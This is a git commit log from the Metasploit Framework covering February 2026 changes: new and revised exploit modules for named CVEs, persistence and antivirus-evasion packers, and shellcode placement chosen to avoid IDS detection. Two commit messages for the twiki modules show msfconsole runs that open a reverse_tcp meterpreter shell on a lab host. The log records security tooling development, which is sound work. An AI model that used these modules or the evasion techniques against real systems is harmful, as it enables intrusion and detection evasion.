entry point from 0xF6 to 0xF8 (word aligned).

Fixes #19668
2026-02-27 19:14:08 +05:30
Valentin Lobstein 615ca34e29 Fix: Remove explicit timeouts from send_request_cgi calls 2026-02-27 14:42:00 +01:00
Valentin Lobstein 6923badeac Fix: Use background thread for cycle.php bootstrap instead of timeout 2026-02-27 14:34:24 +01:00
Valentin Lobstein 76d103e483 Fix: Bootstrap cycle tables and update lab documentation
Add cycle.php bootstrap request in cmd_injection module to create
missing MEMORY tables before starting the cycle_execs.php worker.
Update all three module docs with curl in Dockerfile, Docker gateway
instructions, Options sections, and verified scenario outputs.
2026-02-27 14:33:04 +01:00
dledda-r7 a59738700f chore: moved rc4_packer to x86 sub-directory, rubocop fix 2026-02-27 07:28:14 -05:00
Christophe De La Fuente e60f77af99 Merge pull request #20830 from SilentSobs/fix-filestat-non-gnu
Fix FileStat stat parsing on non-GNU systems
2026-02-27 10:53:51 +01:00
Hemang360 b2500442fe Fix cookie jar documentation examples and add test 2026-02-27 15:01:16 +05:30
Hemang360 a6eb33b657 Fix httpcookie constructor to handle non string value 2026-02-27 14:58:37 +05:30
[Aaditya1273] 2540a16062 Fix msfrpcd JSON-RPC SSL check incorrectly requiring msfdb init #21022 2026-02-27 06:58:34 +05:30
Christophe De La Fuente 6a20b24d9c Land #20740, Separate SSL and SRVSSL options for client and server connections 2026-02-26 18:11:02 +01:00
Valentin Lobstein 2bc2a3e3c0 Fix: Remove extra empty line in run method 2026-02-26 17:26:23 +01:00
Valentin Lobstein 44806b805f Fix: Add http_server_ssl alias to resolve HttpClient/HttpServer mixin conflict 2026-02-26 17:23:39 +01:00
Valentin Lobstein f2856c28b3 Update lib/msf/core/exploit/remote/socket_server.rb
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2026-02-26 17:21:17 +01:00
Valentin Lobstein 3720803cdc Update lib/msf/core/exploit/remote/http_server.rb
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2026-02-26 17:21:03 +01:00
Valentin Lobstein a26036ca7b Update lib/msf/core/exploit/remote/http_server.rb
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
2026-02-26 17:20:37 +01:00
Valentin Lobstein 5c4e5e414f Fix: Use validate method with OptionValidateError instead of validate_options! 2026-02-26 17:19:43 +01:00
Valentin Lobstein 402ed5d50b Docs: Clarify 41086aaa is a pinned vulnerable commit on alpha branch 2026-02-26 17:18:22 +01:00
Valentin Lobstein 097a4700cb Fix: check method returns CheckCode instead of fail_with on login failure 2026-02-26 17:13:57 +01:00
Valentin Lobstein 11806c983d Update modules/exploits/linux/http/tacticalrmm_ssti_rce_cve_2025_69516.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2026-02-26 17:12:42 +01:00
jenkins-metasploit 8475757bcb Bump version of framework to 6.4.117 2026-02-26 15:41:15 +00:00
msutovsky-r7 7e937b3d5a Land #21010, adds reporting the service to Gitlab mixin
Update Gitlab mixin logs
2026-02-26 16:14:35 +01:00
g0t mi1k efe3ef8986 Running-Private-Modules.md: Remove duplicate cmds 2026-02-26 14:49:36 +00:00
jenkins-metasploit 02c421c6a4 automatic module_metadata_base.json update 2026-02-26 14:21:19 +00:00
Diego Ledda 0d259baf5e Merge pull request #20964 from litemars/add_Linux_evasion_module-rc4_packer_arm64
adding RC4 packer arm64, rc4 decrypt routine and sleep evasion routine
2026-02-26 09:11:39 -05:00
g0t mi1k 218c8df3bd twiki_search: Drop MeterpreterTryToFork & fail_with 2026-02-26 09:35:50 +00:00
g0t mi1k fd1d10ec28 twiki_history: Drop MeterpreterTryToFork & fail_with 2026-02-26 09:27:53 +00:00
g0t mi1k 801bc77ec8 twiki_search: Add Linux fetch payload support
Fetch over CmdStager

- - -

Without MeterpreterTryToFork:
[*] Sending stage (1062760 bytes) to 10.0.0.10
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:49864) at 2026-02-19 17:22:57 +0000
[*] Payload sent
[-] Exploit aborted due to failure: unknown: Error sending exploit request
[*] Exploit completed, but no session was created.
msf exploit(unix/webapp/twiki_search) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 4935 created.
Channel 1 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
2026-02-26 07:12:47 +00:00
g0t mi1k 529b53ecc4 twiki_search: Add send_request() function
This is based on MR feedback
2026-02-26 07:12:47 +00:00
g0t mi1k 188832d68f twiki_search: Var consistencies
Sorry, not sorry
2026-02-26 07:12:47 +00:00
g0t mi1k 1d40b352a5 twiki_search: Consistency with exploit & check
Payload & formatting was slightly different
2026-02-26 07:12:47 +00:00
g0t mi1k 0395a27358 twiki_search: Improve error handing 2026-02-26 07:12:47 +00:00
g0t mi1k 71845d44a1 twiki_search: Be more verbose 2026-02-26 07:12:47 +00:00
g0t mi1k 627c1272da twiki_search: Add versions to description
REF: https://web.archive.org/web/20221006175642/https://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch
2026-02-26 07:12:47 +00:00
g0t mi1k c7ffa09f01 twiki_search: Add SEARCH_PATH & switch default
/search/Main/SearchResult - https://www.exploit-db.com/exploits/642   *Works for me*

/view/Main/WebSearch      - https://github.com/rapid7/metasploit-framework/commit/6414821ea860c6f33d9129d9af0e9648be5972a9   *Fails for me*
2026-02-26 07:12:47 +00:00
g0t mi1k 6c804749f2 twiki_search: Switch from > to |tee
Otherwise:
> sh: gt: command not found
2026-02-26 07:12:47 +00:00
g0t mi1k 0b1687b5d5 twiki_history: Add Linux fetch payload support
Fetch over CmdStager

- - -

Without MeterpreterTryToFork:
$ msfconsole -q -x 'set VERBOSE true; setg RHOSTS 10.0.0.10; setg LHOST tap0; use unix/webapp/twiki_history; set payload cmd/linux/http/x86/meterpreter/reverse_tcp; run'
[...]
[*] Sending stage (1062760 bytes) to 10.0.0.10
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:40453) at 2026-02-19 19:30:07 +0000
[*] Payload sent
[-] Exploit aborted due to failure: unknown: Error sending exploit request
[*] Exploit completed, but no session was created.
msf exploit(unix/webapp/twiki_history) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 5042 created.
Channel 1 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
2026-02-26 07:12:43 +00:00
g0t mi1k a22698205e twiki_history: Add send_request() function
This is based on MR feedback
2026-02-26 07:12:43 +00:00
g0t mi1k b393381296 twiki_history: Var consistencies
Sorry, not sorry
2026-02-26 07:12:42 +00:00
g0t mi1k 3adcfb8825 twiki_history: Improve error handing 2026-02-26 07:12:42 +00:00
g0t mi1k 4530fb3d13 twiki_history: Be more verbose 2026-02-26 07:12:42 +00:00
g0t mi1k 97668a0f0f twiki_history: Add TWIKI_PAGE
It can be any twiki page
2026-02-26 07:12:42 +00:00
g0t mi1k cffe0804ab twiki_history: Consistency with exploit & check 2026-02-26 07:12:42 +00:00
g0t mi1k 6177ba25fa twiki_history: Add versions to description
REF: https://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev
2026-02-26 07:12:42 +00:00
g0t mi1k bad9f29265 twiki_history: Add TWIKI_REVISION
Cannot leave it to chance, otherwise you may get HTTP 404
2026-02-26 07:12:42 +00:00
litemars 2dc807a2ce Merge pull request #1 from dledda-r7/collab/feat/aarch64-rc4-packer
chore: moved aarch64 rc4 packer to arch specific folder
2026-02-25 18:10:52 +01:00
jenkins-metasploit 4742ea32f0 automatic module_metadata_base.json update 2026-02-25 16:15:54 +00:00
msutovsky-r7 ccce3a7dca Land #20951, moves default payload into more consistent default options
Moves default payload into default options in Remote for Mac module
2026-02-25 17:06:30 +01:00
msutovsky-r7 45c058d6f1 Land #21005, adds gnu inetutils auth bypass module against a Synology NAS to documentation
add dsm target exploitation to gnu telnetd docs
2026-02-25 16:49:30 +01:00
dledda-r7 f6c980b5fd chore: moved aarch64 rc4 packer to arch specific folder 2026-02-25 09:56:38 -05:00
dledda-r7 73bc6ef118 feat: add netcat flavor option to bind_netcat module for linux and bsd compatibility 2026-02-25 09:25:25 -05:00
Martin Sutovsky 0e60332411 Minor code changes 2026-02-25 14:46:34 +01:00
jenkins-metasploit 24236f99da automatic module_metadata_base.json update 2026-02-25 13:28:24 +00:00
msutovsky-r7 fae76b2961 Land #20978, adds module BeyondTrust unauth command injection (CVE-2026-1731)
Add CVE-2026-1731 support and modernize targets for BeyondTrust PRA/R…
2026-02-25 14:18:59 +01:00
Martin Sutovsky 0c12becfcf Separates modules 2026-02-25 13:56:13 +01:00
Martin Sutovsky 63c7bd4958 Temp rollback 2026-02-25 13:54:20 +01:00
Jonah Burgess 8288cb4713 Merge pull request #1 from msutovsky-r7/collab/exploit/beyondtrust/cve-2026-1731
Moves the module for CVE-2026-1731 into separate module
2026-02-25 12:32:36 +00:00
jenkins-metasploit 09c2d4c610 automatic module_metadata_base.json update 2026-02-25 12:16:21 +00:00
Valentin Lobstein a0cf8b488b Fix: Resolve protocol-relative URLs instead of skipping them 2026-02-25 13:10:30 +01:00
msutovsky-r7 7dcc036b6d Land #21006, adds module for Ollama path traversal RCE (CVE-2024-37032)
Add Ollama path traversal RCE module (CVE-2024-37032)
2026-02-25 13:06:09 +01:00
msutovsky-r7 c5303e2ac1 Apply suggestion from @msutovsky-r7 2026-02-25 12:54:17 +01:00
msutovsky-r7 002daf8d7d Merge branch 'beyondtrust-rce-2026' into collab/exploit/beyondtrust/cve-2026-1731 2026-02-25 12:53:37 +01:00
Jonah Burgess e77b1c00c6 Add CVE-2026-1731 support and modernize targets for BeyondTrust PRA/RS RCE 2026-02-25 10:12:23 +01:00
Valentin Lobstein fd92207119 Fix BeyondTrust exploit failing on older instances (22.x)
The /get_mech_list?version=3 endpoint returns HTTP 500 on older
BeyondTrust versions that do not support the JSON API. Add a
fallback to version=2 which returns semicolon-separated key=value
pairs (e.g. "company=sewtest;product=ingredi").

Also remove the "Thank you for using BeyondTrust" check in the
BRDF validation, as PRA instances do not contain this string,
causing the check method to incorrectly report Unknown for PRA
targets.
2026-02-25 10:12:21 +01:00
Jonah Burgess 4f2eafda09 Changed error wording to remove patch specifics and loosen wording to 'may indicate' as there could be other reasons for the websocket exiting unexpectedly, e.g. using the cmd/unix/generic payload results in the error, even when target is vulnerable and the exploit succeeds 2026-02-25 10:11:18 +01:00
Jonah Burgess 0b78ab319e improved version checking (i think) 2026-02-25 10:11:18 +01:00
Jonah Burgess b43b204060 Add CVE-2026-1731 support and modernize targets for BeyondTrust PRA/RS RCE 2026-02-25 10:11:15 +01:00
dledda-r7 3d17c86610 feat: exposing more configuration as advanced options in bind_netcat payload 2026-02-25 03:19:52 -05:00
Valentin Lobstein 70dd190bc7 Fix: Inline shellcode via asm db instead of mmap RWX
Use Metasm's asm("db ...") to embed shellcode directly in .text section
which is executable by default. Removes mmap/memcpy/mprotect entirely,
avoiding RWX or W^X allocations that IDS may flag.

Parent process uses _exit(0) instead of return since the inlined
shellcode bytes follow the setsid() call in the instruction stream.

Co-Authored-By: jvoisin <325724+jvoisin@users.noreply.github.com>
2026-02-24 23:32:05 +01:00
Valentin Lobstein d6d9180b7c Fix: Clarify why fork+setsid is in the constructor
PrependFork operates at shellcode level, but fork must happen in the
.so constructor so the runner process returns immediately and is not
blocked by the payload execution.

Co-Authored-By: jvoisin <325724+jvoisin@users.noreply.github.com>
2026-02-24 23:29:25 +01:00
Valentin Lobstein 4031d7d950 Fix: Randomize chat trigger message content
Co-Authored-By: jvoisin <325724+jvoisin@users.noreply.github.com>
2026-02-24 23:29:13 +01:00
Valentin Lobstein ece296ba6a Fix: Address jvoisin's PR review feedback
- Remove IOC_IN_LOGS (payload is in POST body, not logged)
- Remove redundant early filter (regex handles it)
- Use non-capturing groups in static asset regex
- Filter protocol-relative URLs before link resolution
- Clarify relative vs absolute path handling in crawler

Co-Authored-By: jvoisin <325724+jvoisin@users.noreply.github.com>
2026-02-24 23:23:17 +01:00
Valentin Lobstein c905ec66e4 Update modules/exploits/multi/http/spip_saisies_rce.rb
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2026-02-24 23:19:03 +01:00
Spencer McIntyre f78941ce94 Merge pull request #20990 from jheysel-r7/doc/gsoc-ai-usage-policy
Add AI Usage Policy to GSoC Ideas Page
2026-02-24 16:03:18 -05:00
msutovsky-r7 12e21e4c66 Fixes documentation 2026-02-24 12:23:26 -05:00
Valentin Lobstein 29a02274cf Refactor: Remove redundant Platform/Arch from single target 2026-02-24 17:54:28 +01:00
Valentin Lobstein 5aeff61b26 Fix: Address PR review feedback for Ollama RCE module
Co-Authored-By: msutovsky-r7 <190406428+msutovsky-r7@users.noreply.github.com>
2026-02-24 17:51:23 +01:00
Valentin Lobstein 33d24cc85b Update modules/exploits/linux/http/ollama_rce_cve_2024_37032.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2026-02-24 17:47:51 +01:00
Ramesh b6d1b7cae6 Fix FileStat stat parsing on non-GNU systems 2026-02-24 21:41:44 +05:30
jenkins-metasploit a9475342c7 automatic module_metadata_base.json update 2026-02-24 15:26:23 +00:00
msutovsky-r7 51af9d0ff1 Adds documentation 2026-02-24 10:25:49 -05:00
Martin Sutovsky 98b3357e2a Adds beyondtrust lib, moves functionality into library, shares those functions to two modules 2026-02-24 16:16:05 +01:00
Brendan 1e7b0083f7 Merge pull request #20952 from g0tmi1k/unreal_ircd_3281_backdoor
Unreal_ircd_3281_backdoor: Add checks & Targets
2026-02-24 09:13:52 -06:00
jenkins-metasploit 12032a3ff8 automatic module_metadata_base.json update 2026-02-24 15:01:18 +00:00
Brendan 1ddee63f05 Merge pull request #20983 from sfewer-r7/0day-grandstream
Add exploit (CVE-2026-2329) and auxiliary modules for the Grandstream GXP1600 series
2026-02-24 08:50:42 -06:00
Martin Sutovsky c390260291 Rubocopes 2026-02-24 13:12:37 +01:00
jenkins-metasploit 5eed30d88c automatic module_metadata_base.json update 2026-02-24 09:50:52 +00:00
Diego Ledda 1e4c184512 Merge pull request #20988 from adfoster-r7/add-solarwinds-srvhost-defaults
Add solarwinds srvhost defaults
2026-02-24 04:41:23 -05:00
Jonah Burgess 338804f028 Changed error wording to remove patch specifics and loosen wording to 'may indicate' as there could be other reasons for the websocket exiting unexpectedly, e.g. using the cmd/unix/generic payload results in the error, even when target is vulnerable and the exploit succeeds 2026-02-24 09:47:49 +01:00
Jonah Burgess fc3a6cd0fe improved version checking (i think) 2026-02-24 09:47:48 +01:00
Jonah Burgess e0bc7c4533 Add CVE-2026-1731 support and modernize targets for BeyondTrust PRA/RS RCE 2026-02-24 09:47:45 +01:00
jenkins-metasploit 6a3d346746 automatic module_metadata_base.json update 2026-02-24 07:12:14 +00:00
msutovsky-r7 62a466cbed Land #20819, adds WSL startup folder persistence module
wsl startup folder persistence
2026-02-24 07:59:11 +01:00
Nayeraneru e6452f5879 hashing adjustment 2026-02-24 03:15:08 +02:00
Jack Heysel 68a7ae887b Add AI Usage Policy to GSoC Ideas Page
Markdown fix

Apply suggestions from code review

Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>

Apply suggestion from @jheysel-r7

Apply suggestion from @jheysel-r7
2026-02-23 17:10:18 -08:00
Nayera 8fb5e4fcad Update spec/lib/msf/core/exploit/http/wordpress/version_spec.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2026-02-24 02:52:46 +02:00
Nayeraneru ae24f73a73 more simplification for gitlab_version function 2026-02-24 02:42:10 +02:00
Nayera 8df17c6c50 Simplifying version handling in GitLab exploit module 2026-02-24 02:26:14 +02:00
Nayera dd6a2f97e9 Apply suggestion from @msutovsky-r7
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2026-02-24 02:19:32 +02:00
h00die ae65d5d9dc linux wsl startup cleanup now with windows path 2026-02-23 18:29:22 -05:00
Valentin Lobstein d934f2006c Feat: Add default payloads per target 2026-02-23 19:36:49 +01:00
Valentin Lobstein bef9b7ad3b Feat: Add Tactical RMM Jinja2 SSTI RCE module (CVE-2025-69516) 2026-02-23 19:31:22 +01:00
jenkins-metasploit 8a8dd7b3c1 automatic module_metadata_base.json update 2026-02-23 16:19:57 +00:00
Simon Janusz dc38f6a9e5 Merge pull request #21012 from adfoster-r7/improve-graphql-introspection-detection-scanner
Improve graphql introspection detection scanner
2026-02-23 16:06:10 +00:00
dwelch-r7 c1caf8ae33 Merge pull request #21011 from adfoster-r7/add-support-for-printing-module-name-prefix
Add support for printing module name prefix
2026-02-23 16:04:54 +00:00
dwelch-r7 14e06f54a9 Merge pull request #21014 from adfoster-r7/fix-crash-when-running-ldap-esc-vulnerable-cert-finder
Fix crash when running ldap esc vulnerable cert finder
2026-02-23 16:00:19 +00:00
sfewer-r7 1f5ad66248 comment gen_buffer to explain why this is needed 2026-02-23 13:04:42 +00:00
sfewer-r7 54f5b88baa clarify the offsets used in patch_offset2cmd 2026-02-23 12:39:37 +00:00
sfewer-r7 2c807a6d95 clarify the initial valud in our rop buffer and the function epilogue that reads them 2026-02-23 12:39:10 +00:00
Nayera b227635c7b Fix service name reporting for WordPress exploit 2026-02-23 13:31:32 +01:00
Nayeraneru 9aa58fcb52 Refactor WordPress service reporting 2026-02-23 13:31:32 +01:00
Nayera d069cba900 Update Wordpress Mixin to log services 2026-02-23 13:31:32 +01:00
adfoster-r7 03f28ebd7c Improve graphql introspection detection scanner 2026-02-23 12:02:30 +00:00
sfewer-r7 4568a8d12f SIP proxt start action will now fail_with if it fails to write the origional config before making any changes 2026-02-23 11:30:06 +00:00
sfewer-r7 8519bffeff add a Check message for this and change from Safe to Unknown which is more accurate 2026-02-23 11:28:53 +00:00
sfewer-r7 6d8f43ac9d fix two typos 2026-02-23 11:27:45 +00:00
adfoster-r7 f00c5b244b Fix crash when running ldap esc vulnerable cert finder 2026-02-23 11:26:44 +00:00
adfoster-r7 70c1abfa27 Add support for printing module name prefix 2026-02-23 10:30:54 +00:00
Nayeraneru a8dcc9616c update gitlab mixin logs 2026-02-23 05:40:59 +02:00
ArkaprabhaChakraborty 6de6dbf695 Fix module documentation
Signed-off-by: ArkaprabhaChakraborty <chakrabortyarkaprabha998@gmail.com>
2026-02-22 20:05:03 +00:00
ArkaprabhaChakraborty 4a1c9cb673 Add module documentation
Signed-off-by: ArkaprabhaChakraborty <chakrabortyarkaprabha998@gmail.com>
2026-02-22 19:59:35 +00:00
h00die ece2374532 target user for wsl_startup_folder 2026-02-21 21:04:40 -05:00
arkaprabhachakraborty 14ac2aec4f Add Administrator Panel login and file extrcation support. Refactor CNEXT functions.
Signed-off-by: arkaprabhachakraborty <chakrabortyarkaprabha998@gmail.com>
2026-02-22 04:14:48 +05:30
Valentin Lobstein cab7bf064e Fix: Add email to Sagi Tzadik credit 2026-02-21 17:06:42 +01:00
Valentin Lobstein 22fb85f648 Fix: Correct vulnerability discovery credit to Sagi Tzadik (Wiz Research) 2026-02-21 17:05:58 +01:00
Valentin Lobstein b17d227d28 Feat: Add Ollama path traversal RCE module (CVE-2024-37032) 2026-02-21 16:52:43 +01:00
h00die a24f53f2b6 add dsm exploitation to telnetd docs 2026-02-21 10:27:47 -05:00
Valentin Lobstein 638b47ebf3 Feat: Unified Selenium Grid/Selenoid RCE with Firefox + Chrome auto-detection
Replace separate Chrome and Firefox modules with a single module that
auto-detects available browsers and picks the best attack vector.
Firefox profile handler preferred (unpatched on all Grid versions).
Remove incorrect CSRF framing, sudo wrapper, add FileDropper and
Selenoid support.
2026-02-21 14:41:42 +01:00
Valentin Lobstein 3dd3661352 Feat: Add Selenoid support to Selenium Grid Chrome RCE module 2026-02-21 12:34:09 +01:00
Valentin Lobstein 9e72f45349 Feat: Add Selenium Grid Chrome binary override RCE module 2026-02-21 12:07:08 +01:00
Valentin Lobstein 20dd4af5d1 Refactor: DRY print_table and empty_array helpers 2026-02-21 10:56:54 +01:00
Valentin Lobstein d8d844980a Fix: Remove non-existent LeakPy GitHub reference 2026-02-21 10:53:44 +01:00
Valentin Lobstein a4d38cda04 Fix: Resolve rubocop offenses in leakix_search module 2026-02-21 10:52:04 +01:00
Valentin Lobstein 692a79a49f Feat: Add LeakIX search module
Add auxiliary/gather/leakix_search module with 6 actions:
SEARCH, HOST, DOMAIN, SUBDOMAINS, PLUGINS, and BULK streaming.
Includes chunked NDJSON streaming for bulk API, MAXRESULTS
limiting, subdomain enumeration, and database reporting.
2026-02-21 10:45:35 +01:00
Valentin Lobstein 53652b3e3b Fix: Update SPIP saisies doc with working lab setup 2026-02-21 09:50:50 +01:00
Valentin Lobstein b904419f28 Fix: Update SPIP saisies doc with working lab setup 2026-02-21 09:50:02 +01:00
Valentin Lobstein a8f66a23d9 Feat: Add SPIP Saisies plugin RCE module (CVE-2025-71243) 2026-02-21 09:32:53 +01:00
Valentin Lobstein fc9b342a2f Fix: Separate SSL and SRVSSL using datastore fallback for backwards compatibility
Add SRVSSL option with fallbacks: ['SSL'] so modules that use both
HttpClient and HttpServer can control server SSL independently from
client SSL. Old scripts that set SSL continue to work via the fallback.
2026-02-21 08:46:57 +01:00
Valentin Lobstein 05c12bb033 Feat: Add three MajorDoMo unauthenticated RCE modules
- CVE-2026-27174: Console eval RCE via missing exit after redirect
- CVE-2026-27175: Command injection via rc/index.php + cycle_execs race condition
- CVE-2026-27180: Supply chain RCE via update URL poisoning in saverestore module

All three modules include documentation with Docker lab setup instructions.
2026-02-21 08:34:31 +01:00
EclipseAditya 320effe9a1 Fix trailing backslash in shell registry operations 2026-02-21 06:13:23 +00:00
[Aaditya1273] d2860254eb Cleanup: Remove legacy windows/local/persistence in favor of windows/persistence/registry 2026-02-21 09:15:56 +05:30
jenkins-metasploit c249939bcd automatic module_metadata_base.json update 2026-02-21 00:56:01 +00:00
Brendan d2ed326b16 Merge pull request #20950 from g0tmi1k/vsftpd_234_backdoor
vsftpd_234_backdoor: Add check & targets
2026-02-20 18:46:34 -06:00
Brendan 1f547f19fb Merge pull request #20832 from DataExplorerX/doc-linux-samba-module
Add documentation for linux/samba/chain_reply module (CVE-2004-0883)
2026-02-20 18:12:05 -06:00
jenkins-metasploit 31c5125a86 automatic module_metadata_base.json update 2026-02-20 23:47:59 +00:00
Brendan 7f8b18d7dc Update documentation/modules/exploit/linux/samba/chain_reply.md 2026-02-20 17:45:14 -06:00
Brendan fcb41a2275 Update documentation/modules/exploit/linux/samba/chain_reply.md
Update documentation to point to a specific wayback machine page since the original does not exist, and a few of the wayback machine links are also broken.
2026-02-20 17:42:34 -06:00
Brendan cf497a8d6e Merge pull request #20938 from Chocapikk/fix-beyondtrust-mech-list-fallback
Fix BeyondTrust PRA/RS exploit failing on older instances
2026-02-20 17:38:40 -06:00
Nayeraneru ce2e23ccef add OptTimedelta datastore option and remove Kerberos-specific clock skew parsing 2026-02-20 22:28:05 +02:00
adfoster-r7 2c7348ec50 Add solarwinds srvhost defaults 2026-02-20 18:23:41 +00:00
adfoster-r7 c9a26319b0 Merge pull request #20995 from rapid7/revert-20969-report-more-acunetix-vulns
Revert "Report more vulns when importing acunetix XML file"
2026-02-20 18:20:04 +00:00
Simon Janusz e6354f3452 Revert "Report more vulns when importing acunetix XML file" 2026-02-20 17:32:42 +00:00
litemars cdd66793bf updating the sleep evasion and the rc4_decrypter for x64 2026-02-20 17:53:24 +01:00
litemars b9b253743d Update modules/evasion/linux/x64_rc4_packer.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2026-02-20 17:43:22 +01:00
litemars a377cfd0e3 updating rc4 decrypter and sleep evasion with Metasm 2026-02-20 17:40:18 +01:00
litemars 325f33ae41 Update modules/evasion/linux/x86_rc4_packer.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2026-02-20 17:22:53 +01:00
litemars ecbe73609b updating the sleep module and the rc4_decrypter for aarch64 2026-02-20 17:19:50 +01:00
dwelch-r7 671ecf8f8f Merge pull request #20993 from adfoster-r7/remove-encoding-issue-in-source-file
Remove encoding issue in source file
2026-02-20 13:56:38 +00:00
jenkins-metasploit 018a2d3fdd automatic module_metadata_base.json update 2026-02-20 13:37:13 +00:00
adfoster-r7 37fc0383c6 Remove encoding issue in source file 2026-02-20 13:33:50 +00:00
adfoster-r7 250ef3b2d8 Merge pull request #20992 from adfoster-r7/add-check-method-alias-to-ms17-010-scanner-module
Add check method to ms17-010 scanner module
2026-02-20 13:27:32 +00:00
adfoster-r7 577f6f662f Add check method to ms17-010 scanner module 2026-02-20 13:12:39 +00:00
msutovsky-r7 ea51c45bf5 Land #20859, breaks up utils/exe.rb into separated files
utils/exe.rb break-up
2026-02-20 12:41:15 +01:00
jenkins-metasploit 667db874f5 automatic module_metadata_base.json update 2026-02-20 09:56:41 +00:00
msutovsky-r7 f2262a84cc Land #20841, adds persistence module for Windows feature active setup
active setup persistence
2026-02-20 10:46:45 +01:00
g0t mi1k f65dca14c7 unreal_ircd: Clean up
This is based on MR feedback
2026-02-20 08:59:32 +00:00
g0t mi1k 63bead7de0 unreal_ircd: Drop loop for wfsDelay 2026-02-20 08:59:32 +00:00
g0t mi1k 3a8c6abd39 unreal_ircd: Add Linux fetch payload support
Fetch over CmdStager (& multiple targets)
2026-02-20 08:57:57 +00:00
g0t mi1k 3200b6f9f9 unreal_ircd: Reconfig default target 2026-02-20 08:55:18 +00:00
Martin Sutovsky 993017d045 Rubocopes 2026-02-20 09:51:10 +01:00
g0t mi1k bc81140d4f vsftpd_234_backdoor: Add Linux fetch payload support
Fetch over CmdStager (& multiple targets)
2026-02-20 08:45:15 +00:00
g0t mi1k 53ac84be03 vsftpd_234_backdoor: Reconfig default target 2026-02-20 08:45:11 +00:00
g0t mi1k 5c29007f85 vsftpd_234_backdoor: Add comments 2026-02-20 08:17:41 +00:00
g0t mi1k dc2ec5ef39 vsftpd_234_backdoor: Be more verbose 2026-02-20 08:17:37 +00:00
g0t mi1k 7161c2cbe6 vsftpd_234_backdoor: Checks & raises for exploit 2026-02-20 08:14:11 +00:00
g0t mi1k 037826daf5 vsftpd_234_backdoor: Add check 2026-02-20 08:10:45 +00:00
h00die 855b436235 Update modules/exploits/windows/persistence/registry_active_setup.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2026-02-19 15:46:33 -05:00
litemars 25da41e9f3 Apply suggestion from @msutovsky-r7
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2026-02-19 17:14:29 +01:00
jenkins-metasploit 322df15b65 Bump version of framework to 6.4.116 2026-02-19 16:10:44 +00:00
Diego Ledda 247449ad8e chore: rubocop pass 2026-02-19 14:46:57 +01:00
Diego Ledda e6dc725a07 Apply suggestion from @dledda-r7 2026-02-19 14:38:34 +01:00
gregd 36b29fb458 Add vulnerable environment setup guide to module documentation
Step-by-step minikube-based setup for deploying a vulnerable
che-machine-exec instance for module verification.
2026-02-19 11:27:27 +00:00
jenkins-metasploit 83f789d153 automatic module_metadata_base.json update 2026-02-19 09:16:01 +00:00
msutovsky-r7 b6f37bef11 Land #20976, adds module for StoryChief WP plugin (CVE-2025-7441)
Add StoryChief WordPress 1.0.42 unauthenticated RCE module (CVE-2025-7441)
2026-02-19 10:06:25 +01:00
Jack Heysel 4197e759f2 Add spec 2026-02-18 16:55:09 -08:00
Jack Heysel 252e69650e Added link to RFC in comment 2026-02-18 15:20:37 -08:00
Jack Heysel e0977470c4 Add RASN1 class for SpnegoNegTokenInit 2026-02-18 15:12:50 -08:00
jenkins-metasploit 0e7613ea1e automatic module_metadata_base.json update 2026-02-18 16:07:53 +00:00
Diego Ledda c6f7d03d03 Merge pull request #20919 from h00die/emacs
emacs extension persistence
2026-02-18 10:58:13 -05:00
Nayeraneru a48129b640 Updated doc after checking msftidy_docs 2026-02-18 16:58:51 +02:00
gregd bcc6622b1d Fix intermittent hello frame timing issue where it would sometimes
arrive after Rex finishes parsing the HTTP 101 response, leaving
res.body empty. Add a fallback that reads the frame directly from the
socket using get_wsframe with a timeout when the body is blank.
2026-02-18 14:49:39 +00:00
litemars 57b17a45c2 add comment on support of memfd_create Kernel>3.17 2026-02-18 15:14:27 +01:00
litemars 152397ad4b add comment on support of memfd_create Kernel>3.17 2026-02-18 15:13:06 +01:00
Diego Ledda f369cac6d7 Apply suggestion from @jvoisin
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
2026-02-18 12:24:09 +01:00
jenkins-metasploit 3e34388a82 automatic module_metadata_base.json update 2026-02-18 11:14:43 +00:00
Diego Ledda 8af82dc7eb Merge pull request #20844 from 6a6f656c/userinit
Windows Userinit persistence
2026-02-18 06:05:04 -05:00
Diego Ledda 9f301549e8 Update documentation/modules/exploit/windows/persistence/registry_userinit.md
Co-authored-by: h00die <h00die@users.noreply.github.com>
2026-02-18 11:46:11 +01:00
Nayeraneru 9c7347d6b5 Trriged failed_with and Removed unnecessary line 2026-02-18 02:20:36 +02:00
sfewer-r7 08efa9cd16 add in the Grandstream modules 2026-02-17 22:33:46 +00:00
Nayera faca50288d Enhance CheckCode::Safe message for clarity
Update CheckCode::Safe to include a detailed message.
2026-02-18 00:14:18 +02:00
h00die 2689c6c03b fix compatibility with session.sys 2026-02-17 16:38:22 -05:00
h00die 1c6fb0d11d fix compatibility with session.sys 2026-02-17 16:37:05 -05:00
litemars 438e3a23b4 Update lib/msf/core/payload/linux/aarch64/sleep_evasion.rb
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com>
2026-02-17 22:09:36 +01:00
h00die aacdcfc3a4 Update lib/msf/core/post/linux/wsl.rb
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
2026-02-17 16:00:59 -05:00
